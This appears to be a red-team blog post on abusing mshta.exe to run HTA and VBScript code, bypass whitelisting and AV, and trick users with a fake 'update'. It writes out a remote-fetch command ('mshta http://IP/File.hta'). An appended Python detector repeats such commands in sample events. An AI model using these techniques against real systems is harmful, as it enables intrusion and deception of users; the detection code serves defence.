MSHTA

Microsoft HTML Applications

Mshta is a utility that executes Microsoft HTML Applications (HTA). HTA files have the file extension .hta. HTAs are standalone applications that execute using the same models and technologies as Internet Explorer, but outside of the browser.

Adversaries can use mshta.exe to proxy execution of malicious .hta files and JavaScript or VBScript through a trusted Windows utility. There are several examples of different types of threats leveraging mshta.exe during initial compromise and for execution of code.

Files may be executed through an inline script and can also be executed directly from URLs. Mshta.exe can be used to bypass application whitelisting solutions that do not account for its potential use. Since mshta executes outside of the Internet Explorer security context, it also bypasses browser security settings.

Some examples of mshta running:

In this demo I execute a VBScript one-liner that just calls a simple MsgBox to show that the code was executed. But can we go a bit further? What about using this for enumeration, or calling a shell?

A shell caught with Metasploit's handler

What about some social engineering, asking them to install an "update"? We can modify this more extensively so that when they click OK they will be asked to download and execute a file of our choice.

Can we do it on a remote host without downloading to the target machine? MSHTA can also call a file from a remote server; the syntax is as simple as mshta http://IP/File.hta. In this example the HTA file executes calc.exe.

These are a few of many ways to use mshta to execute code; it comes down to creativity in what it can be used for and how it can help on a red team job. We talked about how it can bypass AVs and avoid any mysterious logs, but any experienced Blue Team analyst can tell you that it is very weird for mshta to call cmd.exe. This is just a way to minimize the footprint.
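As an added defensive example (not part of the original post): a small Python detector that tags the mshta patterns described above in constructed Sysmon-style process-creation events, namely a remote HTA fetched over http(s), an inline vbscript:/javascript: one-liner, and mshta spawning cmd.exe. The event tuple layout, sample paths and IP are assumptions made for this example.

```python
import re

# Constructed sample events in a Sysmon Event ID 1 (process creation) style:
# (ParentImage, Image, CommandLine). All values are made up for the example.
SAMPLE_EVENTS = [
    (r"C:\Windows\explorer.exe", r"C:\Windows\System32\mshta.exe",
     'mshta.exe "C:\\Users\\u\\Desktop\\report.hta"'),          # local HTA, no tag
    (r"C:\Windows\explorer.exe", r"C:\Windows\System32\mshta.exe",
     "mshta http://203.0.113.10/File.hta"),                      # remote HTA
    (r"C:\Windows\System32\mshta.exe", r"C:\Windows\System32\cmd.exe",
     "cmd.exe /c whoami"),                                       # mshta -> cmd.exe
    (r"C:\Windows\explorer.exe", r"C:\Windows\System32\mshta.exe",
     'mshta vbscript:Execute("MsgBox(""code executed"")")'),     # inline one-liner
    (r"C:\Windows\explorer.exe", r"C:\Windows\System32\notepad.exe",
     "notepad.exe notes.txt"),                                   # benign, no tag
]

REMOTE_RE = re.compile(r"https?://", re.IGNORECASE)
INLINE_RE = re.compile(r"\b(vbscript|javascript):", re.IGNORECASE)
SHELLS = {"cmd.exe", "powershell.exe"}

def basename(path: str) -> str:
    """Last component of a Windows path, lower-cased for comparison."""
    return path.rsplit("\\", 1)[-1].lower()

def classify(parent: str, image: str, cmdline: str) -> list[str]:
    """Return the detection tags that fire for one process-creation event."""
    tags = []
    if basename(image) == "mshta.exe":
        if REMOTE_RE.search(cmdline):
            tags.append("mshta_remote_hta")      # mshta http://IP/File.hta
        if INLINE_RE.search(cmdline):
            tags.append("mshta_inline_script")   # vbscript:/javascript: one-liner
    if basename(parent) == "mshta.exe" and basename(image) in SHELLS:
        tags.append("mshta_spawned_shell")       # mshta calling cmd.exe is rarely legitimate
    return tags

def scan(events):
    """Return (index, tags) for every event that triggers at least one rule."""
    return [(i, classify(*ev)) for i, ev in enumerate(events) if classify(*ev)]

if __name__ == "__main__":
    for i, tags in scan(SAMPLE_EVENTS):
        print(i, SAMPLE_EVENTS[i][2], tags)
```

A plain local .hta launch (event 0) deliberately produces no tag, since HTAs do have legitimate uses; the signal is in the remote source, the inline script, or the child shell.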
